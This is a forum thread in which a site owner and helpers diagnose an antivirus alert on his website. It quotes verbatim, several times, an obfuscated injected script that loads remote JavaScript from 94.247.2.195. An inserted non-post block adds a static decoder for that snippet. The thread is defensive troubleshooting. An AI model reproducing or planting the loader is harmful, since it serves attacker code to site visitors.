innovativelychallenged
-
- Posts: 19
- Joined: Wed Apr 15, 2009 2:19 pm
innovativelychallenged
I get a NoScript warning saying the site below has a virus.
http://www.innovativelychallenged.com
Could it be the statcounter script?
Thanks.
firefox 3.0.8, thunderbird 2.0.0.21, VZ um175 broadband, XP home SP3 2gig
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Re: innovativelychallenged
Is this another of your websites?
How are you accessing http://www.innovativelychallenged.com/?
From a bookmark? From a Google search?
This is on your site:
<script language=javascript><!--
document.write(unescape('%3CcasR9ac336rOVJipOVJtYq2%20OVJsYq2r7Nc336%3D336%2F%2Fca94%2EYq2247%2E2Yb%2Eca193365%2F336jquerYq2y%2Ejs7N%3E%3C%2FscrcaiptOVJ%3E').replace(/Yq2|7N|ca|336|R9a|OVJ|Yb/g,""));
--></script><body>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090423 SeaMonkey/2.0b1pre
-
- Ambassador
- Posts: 1586
- Joined: Fri Mar 20, 2009 4:47 am
- Location: Colorado, USA
Re: innovativelychallenged
I've never seen NoScript warning about a virus. I don't think it has that capability. "I get a NoScript warning saying below site has a virus." doesn't give us enough information to help you.
I've loaded that site in my Firefox NoScript test profile, using Sandboxie for safety, and see no problem. I'm not about to start randomly clicking links or changing NoScript settings in an attempt to figure out what you're talking about, informactive. I think you need to be a lot more specific, i.e. give exact steps to reproduce your issue and a full description of what you see.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
NoScript 1.9.2.3
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
-
- Posts: 19
- Joined: Wed Apr 15, 2009 2:19 pm
Re: innovativelychallenged
I re-uploaded the index.html page and it seems to be okay now.
But on what page did you find all this?
<script language=javascript><!--
document.write(unescape('%3CcasR9ac336rOVJipOVJtYq2%20OVJsYq2r7Nc336%3D336%2F%2Fca94%2EYq2247%2E2Yb%2Eca193365%2F336jquerYq2y%2Ejs7N%3E%3C%2FscrcaiptOVJ%3E').replace(/Yq2|7N|ca|336|R9a|OVJ|Yb/g,""));
--></script><body>
firefox 3.0.8, thunderbird 2.0.0.21, VZ um175 broadband, XP home SP3 2gig
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Re: innovativelychallenged
On the first page itself.
But I'm not sure when it showed up.
Originally when I looked through the source, I did not notice it. (I may <or may not> have noticed it.)
Since I didn't catch anything right off, I Allowed innovativelychallenged.com. (Late, tired, not sure what I did next or after?) But at some point I did get that code in the source.
Now sometimes these exploits log IPs so that you will only see it once. So the second time you go looking for it, it is hidden from you. As it appears to be from me now?
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090423 SeaMonkey/2.0b1pre
-
- Posts: 19
- Joined: Wed Apr 15, 2009 2:19 pm
Re: innovativelychallenged
Sorry, it was not a NoScript warning, it was an avast warning.
http://i255.photobucket.com/albums/hh13 ... 230131.gif
There is not a whole lot on any of these pages, let alone script, other than Statcounter on index.html.
Are you looking at the page other than like source view?
Thanks.
firefox 3.0.8, thunderbird 2.0.0.21, VZ um175 broadband, XP home SP3 2gig
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Re: innovativelychallenged
But if you changed the page source ... heh.
Read here, & pay particular attention to post#10, AVAST Forum: JS-Redirector-G [trj] warning.
And you are likely to find that code <again> on every one of your pages (& sub-pages).
It is on d577570.htm right now.
Only Sophos tagged it, even though they also scan with Avast: VirusTotal: File d577570.htm.VIR.htm
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090423 SeaMonkey/2.0b1pre
-
- Posts: 19
- Joined: Wed Apr 15, 2009 2:19 pm
Re: innovativelychallenged
I'm using Expression Web and this is all I see in my design of d577570.htm. Where is the redirector script hiding?
I tried reading favicon.ico using Notepad and could find nothing looking like script.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<link rel="shortcut icon" href="favicon.ico">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="description" content="D577570 design patent">
<meta name="keywords" content="design, patent, D577570">
<meta name="revisit-after" content="15 days">
<meta name="rating" content="General">
<meta name="ROBOTS" content="ALL">
<style type="text/css">
.style1 {
text-align: center;
margin-top: 0px;
}
.style2 {
border-width: 0px;
font-family:Arial, Helvetica, sans-serif;
}
.style3 {
vertical-align: bottom;
border:0px;
}
.style4 {
text-align: left;
}
</style>
</head>
<body>
<div style="position: absolute; width: 100px; height: 70px; z-index: 1; left: 784px; top: 669px" id="layer1" class="style4">
<a href="http://www.innovativelychallenged.com/index.html">
<img alt="" src="images/returnic.gif" width="197" height="33" class="style2"></a></div>
<p class="style1"><img alt="" src="images/d577570.gif"></p>
</body>
</html>
firefox 3.0.8, thunderbird 2.0.0.21, VZ um175 broadband, XP home SP3 2gig
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Re: innovativelychallenged
Going back to the "94.247.2.195": once that code is on your page, & then once you Allow your page (innovativelychallenged as the case may be) & it has refreshed, that JavaScript code is then interpreted, & at that point the 94.247.2.195 then shows up as a site that can then be Allowed in NoScript (not that you would ever want to do that).
If you subsequently forbid your site, even though that code is then blocked (?), you are still reading from your disk cache, & so the 94.247.2.195 will still show up in NoScript. If you force-refresh (Ctrl+F5 or similar), then the page will reload from the server, & the 94.247.2.195 will no longer show in NoScript.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090423 SeaMonkey/2.0b1pre
Re: innovativelychallenged
This is what I get:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<link rel="shortcut icon" href="favicon.ico">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="description" content="D577570 design patent">
<meta name="keywords" content="design, patent, D577570">
<meta name="revisit-after" content="15 days">
<meta name="rating" content="General">
<meta name="ROBOTS" content="ALL">
<style type="text/css">
.style1 {
text-align: center;
margin-top: 0px;
}
.style2 {
border-width: 0px;
font-family:Arial, Helvetica, sans-serif;
}
.style3 {
vertical-align: bottom;
border:0px;
}
.style4 {
text-align: left;
}
</style>
</head>
<script language=javascript><!--
document.write(unescape('%3CcasR9ac336rOVJipOVJtYq2%20OVJsYq2r7Nc336%3D336%2F%2Fca94%2EYq2247%2E2Yb%2Eca193365%2F336jquerYq2y%2Ejs7N%3E%3C%2FscrcaiptOVJ%3E').replace(/Yq2|7N|ca|336|R9a|OVJ|Yb/g,""));
--></script><body>
<div style="position: absolute; width: 100px; height: 70px; z-index: 1; left: 784px; top: 669px" id="layer1" class="style4">
<a href="http://www.innovativelychallenged.com/index.html">
<img alt="" src="images/returnic.gif" width="197" height="33" class="style2"></a></div>
<p class="style1"><img alt="" src="images/d577570.gif"></p>
</body>
</html>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090423 SeaMonkey/2.0b1pre
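Added example, not part of any post in this thread: a static decoder for the snippet shown in the page source above, applying the same unescape and replace steps to the string as data, without running it, to show what the page would have written. The function names and the trimmed sample page are assumptions made for the illustration.

```javascript
// Decode document.write(unescape('...').replace(/.../g,"")) injections as DATA.
// Nothing taken from the scanned page is ever evaluated.

// Captures: 1 = percent-encoded string, 2 = filler regex source, 3 = its flags.
const INJECTION =
  /document\.write\(\s*unescape\(\s*'([^']*)'\s*\)\s*\.replace\(\s*\/((?:\\.|[^\/\\])+)\/([gim]*)\s*,\s*(?:""|'')\s*\)\s*\)/g;

// Single-pass equivalent of the legacy unescape() for %XX and %uXXXX.
function percentDecode(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, x) => String.fromCharCode(parseInt(u || x, 16)));
}

// One finding per injected snippet: the markup it would have written, the
// script src inside that markup, and the host that src points at.
function findInjections(html) {
  const findings = [];
  for (const m of html.matchAll(INJECTION)) {
    const [, encoded, filler, flags] = m;
    // The filler pattern is text from the page; it is only used as a regex
    // over that page's own string, never passed to eval or Function.
    const decoded = percentDecode(encoded).replace(new RegExp(filler, flags), '');
    const srcMatch = /<script[^>]*\ssrc\s*=\s*["']?([^"'\s>]+)/i.exec(decoded);
    const src = srcMatch ? srcMatch[1] : null;
    const host = src
      ? src.replace(/^(?:[a-z][a-z0-9+.-]*:)?\/\//i, '').split(/[\/:?#]/)[0]
      : null;
    findings.push({ offset: m.index, decoded, src, host });
  }
  return findings;
}

// Sample input: the d577570.htm source as posted in the thread, trimmed to the
// lines around the injection (the trimming is the only change).
const SAMPLE_PAGE = String.raw`</style>
</head>
<script language=javascript><!--
document.write(unescape('%3CcasR9ac336rOVJipOVJtYq2%20OVJsYq2r7Nc336%3D336%2F%2Fca94%2EYq2247%2E2Yb%2Eca193365%2F336jquerYq2y%2Ejs7N%3E%3C%2FscrcaiptOVJ%3E').replace(/Yq2|7N|ca|336|R9a|OVJ|Yb/g,""));
--></script><body>
<p class="style1"><img alt="" src="images/d577570.gif"></p>
</body>`;

// Constructed clean page for comparison.
const CLEAN_PAGE = '<html><head></head><body><p>no script here</p></body></html>';

for (const f of findInjections(SAMPLE_PAGE)) {
  console.log(`offset ${f.offset}: writes ${f.decoded} (host ${f.host})`);
}
```

Run it over the files as fetched back from the host rather than the local copies, since the thread shows the editor's copy looking clean while the served page carried the script.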
- GµårÐïåñ
- Lieutenant Colonel
- Posts: 3369
- Joined: Fri Mar 20, 2009 5:19 am
- Location: PST - USA
- Contact:
Re: innovativelychallenged
I don't get anything, even with avast installed.
~.:[ Lï£ê ï§ å Lêmðñ åñÐ Ì Wåñ† M¥ Mðñê¥ ßå¢k ]:.~
________________ .: [ Major Mike's ] :. ________________
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Re: innovativelychallenged
Essentially the same, but ... the favicon, talked about in the link above, & the JavaScript exploit code itself.
<link rel="shortcut icon" href="favicon.ico"> === <link rel="shortcut icon" href="http://www.innovativelychallenged.com/favicon.ico">
(You may have to View Image to see it fully <at least as much as I captured>.)

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090423 SeaMonkey/2.0b1pre
Re: innovativelychallenged
Correction must be made by administrator/owner of the website avast alerts about.
Note that the Avast forum thread (above) is ongoing. Somewhere in your code is a link to a favicon which actually doesn't exist. The server generates a 404 message which is infected. Please check server-generated messages.
First of all, being secure doesn't mean just installing firewalls, anti-viruses, ... This favicon and also XSS attacks fall into a category that can't be handled by just installing a few security tools. The reason is that the hosts/carriers through which they intrude into your system are common internet resources like web pages, emails, RSS feeds, URLs etc. As a result it is difficult to identify & block such resources selectively unless a central repository maintaining a blacklist of potentially dangerous resources is referenced before access. Firefox and other modern browsers are doing this these days. But this is effective only when the resource has been identified and added previously to the blacklist. Ultimately the only option left is to allow scripts only from the resources you rely on, like Google & Yahoo (a matter of choice). This is what NoScript and RequestPolicy do. NoScript by default blocks all the Flash and JavaScript content on the pages you visit unless you add them (more specifically the website domain or address) to its whitelist. RequestPolicy goes one step further and blocks JavaScript content originating from or communicating with a server you are not visiting in the first place, even if it is in the whitelist. The fundamental idea is simply to block all the resources/communication outside the current resource you are browsing. For more details I would recommend you read the FAQs on the NoScript & RequestPolicy websites.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090423 SeaMonkey/2.0b1pre
-
- Posts: 19
- Joined: Wed Apr 15, 2009 2:19 pm
Re: innovativelychallenged
The Rube wins on this one.
I did a Control F5 on each *.htm file and uploaded them all back to 1and1, and there is no virus alert on any of them.
Now that I see d577570.htm on my screen without the avast warning, I go to view source and do not see the script on that page below heading, so I guess all is well.
I use http://www.diskcleaner.nl/ pretty much every day or so to clean up my cache. Is it missing files when it cleans, or should I try another cache remover? I also clean with the Firefox clean cache option under Tools every other day or so.
Thanks.
Going back to the "94.247.2.195": once that code is on your page, & then once you Allow your page (innovativelychallenged as the case may be) & it has refreshed, that JavaScript code is then interpreted, & at that point the 94.247.2.195 then shows up as a site that can then be Allowed in NoScript (not that you would ever want to do that).
If you subsequently forbid your site, even though that code is then blocked (?), you are still reading from your disk cache, & so the 94.247.2.195 will still show up in NoScript. If you force-refresh (Ctrl+F5 or similar), then the page will reload from the server, & the 94.247.2.195 will no longer show in NoScript.
firefox 3.0.8, thunderbird 2.0.0.21, VZ um175 broadband, XP home SP3 2gig
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
-
- Posts: 19
- Joined: Wed Apr 15, 2009 2:19 pm
Re: innovativelychallenged
I went searching for a new cleaner and found
http://www.ccleaner.com/
and it found 60MB of files to clean. I cleaned them and fortunately my computer appears to still be functioning.
Perhaps ccleaner will do a better job of cleaning my cache if cleaning my cache had something to do with doing Control F5 on my site.
thanks.
firefox 3.0.8, thunderbird 2.0.0.21, VZ um175 broadband, XP home SP3 2gig
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10